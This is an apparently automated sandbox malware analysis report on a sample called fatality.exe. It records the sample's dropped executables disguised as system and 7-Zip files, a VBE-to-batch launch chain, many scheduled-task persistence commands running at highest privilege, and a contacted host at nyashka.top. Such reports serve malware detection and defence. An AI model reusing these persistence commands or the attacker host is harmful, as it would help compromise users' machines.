                                    Source: mQBLhXIPAJ.exe, 00000013.00000002.2290300751.0000000002908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyashka.top/
                                    Source: mQBLhXIPAJ.exe, 00000013.00000002.2290300751.0000000002908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php
                                    Source: containerReview.exe, 00000005.00000002.2220599721.0000000002E4D000.00000004.00000800.00020000.00000000.sdmp, mQBLhXIPAJ.exe, 00000013.00000002.2290300751.0000000002908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: fatality.exe, 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/
                                    Source: fatality.exe, 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/openU

                                    System Summary

                                    Source: fatality.exeStatic PE information: section name:
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_05256861 NtQueryInformationProcess,GetSystemInfo,0_2_05256861
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCBCEC8111DA4C46C5BB72BE8163F3D647.TMP
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCBCEC8111DA4C46C5BB72BE8163F3D647.TMP
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\GgZbKUMi.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: String function: 00DFEC50 appears 53 times
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: String function: 00DFF5F0 appears 32 times
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: String function: 00DFEB78 appears 36 times
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: String function: 00E5F264 appears 70 times
                                    Source: RLUzQxgL.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: PRRjZxCV.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: RUDRugHQ.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: GgZbKUMi.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: yCQlabwB.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: LTranRbW.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: ucFnGTXv.log.19.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: jPEOVQoM.log.19.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: HTJtRROP.log.19.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: nCWNxMEA.log.19.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: eTDxNkzS.log.19.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: VquIdqjl.log.19.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: fatality.exe, 00000000.00000003.2048582491.0000000003492000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs fatality.exe
                                    Source: fatality.exe, 00000000.00000003.2048582491.0000000003492000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs fatality.exe
                                    Source: fatality.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs fatality.exe
                                    Source: fatality.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: containerReview.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: mQBLhXIPAJ.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: mQBLhXIPAJ.exe0.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: containerReview.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: mQBLhXIPAJ.exe1.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: mQBLhXIPAJ.exe2.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: fatality.exeStatic PE information: Section: ZLIB complexity 0.997276135089686
                                    Source: fatality.exeStatic PE information: Section: ZLIB complexity 0.9945203993055556
                                    Source: fatality.exeStatic PE information: Section: cheat ZLIB complexity 0.9969160071699135
                                    Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@58/46@10/0
                                    Source: C:\blockcomSession\containerReview.exeFile created: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe
                                    Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\PRRjZxCV.log
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5356:120:WilError_03
                                    Source: C:\blockcomSession\containerReview.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1984:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:320:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2924:120:WilError_03
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-KNZ6qT1z1KAE3Pr0GoKV
                                    Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\AppData\Local\Temp\qvvd4xnd
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockcomSession\R3z0peym99fhJdrKbUwEGrQMoM2HpnSPGrE0X0k2hc.bat" "
                                    Source: C:\Users\user\Desktop\fatality.exeCommand line argument: sfxname0_2_00DFDF1E
                                    Source: C:\Users\user\Desktop\fatality.exeCommand line argument: sfxstime0_2_00DFDF1E
                                    Source: C:\Users\user\Desktop\fatality.exeCommand line argument: STARTDLG0_2_00DFDF1E
                                    Source: C:\Users\user\Desktop\fatality.exeCommand line argument: xz0_2_00DFDF1E
                                    Source: C:\Users\user\Desktop\fatality.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                    Source: fatality.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Users\user\Desktop\fatality.exeFile read: C:\Windows\win.ini
                                    Source: C:\Users\user\Desktop\fatality.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                    Source: fatality.exeVirustotal: Detection: 83%
                                    Source: fatality.exeReversingLabs: Detection: 71%
                                    Source: fatality.exeString found in binary or memory: <Module>{B88D4D76-330A-4D76-ADDC-F680C30484D3}
                                    Source: C:\Users\user\Desktop\fatality.exeFile read: C:\Users\user\Desktop\fatality.exe
                                    Source: unknownProcess created: C:\Users\user\Desktop\fatality.exe "C:\Users\user\Desktop\fatality.exe"
                                    Source: C:\Users\user\Desktop\fatality.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockcomSession\R3z0peym99fhJdrKbUwEGrQMoM2HpnSPGrE0X0k2hc.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\blockcomSession\containerReview.exe "C:\blockcomSession/containerReview.exe"
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 10 /tr "'C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe'" /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mQBLhXIPAJ" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8539.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4E919528C4A844BA8820AEF1C7C5AE5.TMP"
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glp1j4aa\glp1j4aa.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES87BA.tmp" "c:\Windows\System32\CSCBCEC8111DA4C46C5BB72BE8163F3D647.TMP"
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 13 /tr "'C:\blockcomSession\mQBLhXIPAJ.exe'" /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mQBLhXIPAJ" /sc ONLOGON /tr "'C:\blockcomSession\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 14 /tr "'C:\blockcomSession\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                    Source: unknownProcess created: C:\blockcomSession\mQBLhXIPAJ.exe C:\blockcomSession\mQBLhXIPAJ.exe
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\dbg\containerReview.exe'" /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "containerReview" /sc ONLOGON /tr "'C:\Users\All Users\dbg\containerReview.exe'" /rl HIGHEST /f
                                    Source: unknownProcess created: C:\blockcomSession\mQBLhXIPAJ.exe C:\blockcomSession\mQBLhXIPAJ.exe
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\dbg\containerReview.exe'" /rl HIGHEST /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Templates\mQBLhXIPAJ.exe'" /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mQBLhXIPAJ" /sc ONLOGON /tr "'C:\Users\Default\Templates\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Templates\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mQBLhXIPAJ" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "containerReview" /sc ONLOGON /tr "'C:\blockcomSession\containerReview.exe'" /rl HIGHEST /f
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat"
                                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: unknown | Process created: C:\blockcomSession\containerReview.exe C:\blockcomSession\containerReview.exe
                                    Source: unknown | Process created: C:\blockcomSession\containerReview.exe C:\blockcomSession\containerReview.exe
                                    Source: C:\Windows\System32\cmd.exe | Process created: C:\ProgramData\dbg\containerReview.exe "C:\Users\All Users\dbg\containerReview.exe"
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2BGdjLelXV.bat"
                                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: unknown | Process created: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe "C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe"
                                    Source: C:\Windows\System32\cmd.exe | Process created: C:\blockcomSession\mQBLhXIPAJ.exe "C:\blockcomSession\mQBLhXIPAJ.exe"
                                    Source: unknown | Process created: C:\blockcomSession\containerReview.exe "C:\blockcomSession\containerReview.exe"
                                    Source: C:\Users\user\Desktop\fatality.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockcomSession\R3z0peym99fhJdrKbUwEGrQMoM2HpnSPGrE0X0k2hc.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\blockcomSession\containerReview.exe "C:\blockcomSession/containerReview.exe"
                                    Source: C:\blockcomSession\containerReview.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline"
                                    Source: C:\blockcomSession\containerReview.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glp1j4aa\glp1j4aa.cmdline"
                                    Source: C:\blockcomSession\containerReview.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8539.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4E919528C4A844BA8820AEF1C7C5AE5.TMP"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES87BA.tmp" "c:\Windows\System32\CSCBCEC8111DA4C46C5BB72BE8163F3D647.TMP"
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2BGdjLelXV.bat"
                                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exe | Process created: C:\ProgramData\dbg\containerReview.exe "C:\Users\All Users\dbg\containerReview.exe"
                                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exe | Process created: C:\blockcomSession\mQBLhXIPAJ.exe "C:\blockcomSession\mQBLhXIPAJ.exe"
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: wldp.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: profapi.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: cryptsp.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: rsaenh.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: cryptbase.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: mscoree.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: kernel.appcore.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: version.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: uxtheme.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: windows.storage.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: wldp.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: profapi.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: cryptsp.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: rsaenh.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: cryptbase.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: sspicli.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: mscoree.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: kernel.appcore.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: version.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: uxtheme.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: windows.storage.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: wldp.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: profapi.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: cryptsp.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: rsaenh.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: cryptbase.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: sspicli.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: mscoree.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: apphelp.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: version.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: uxtheme.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: windows.storage.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: wldp.dll
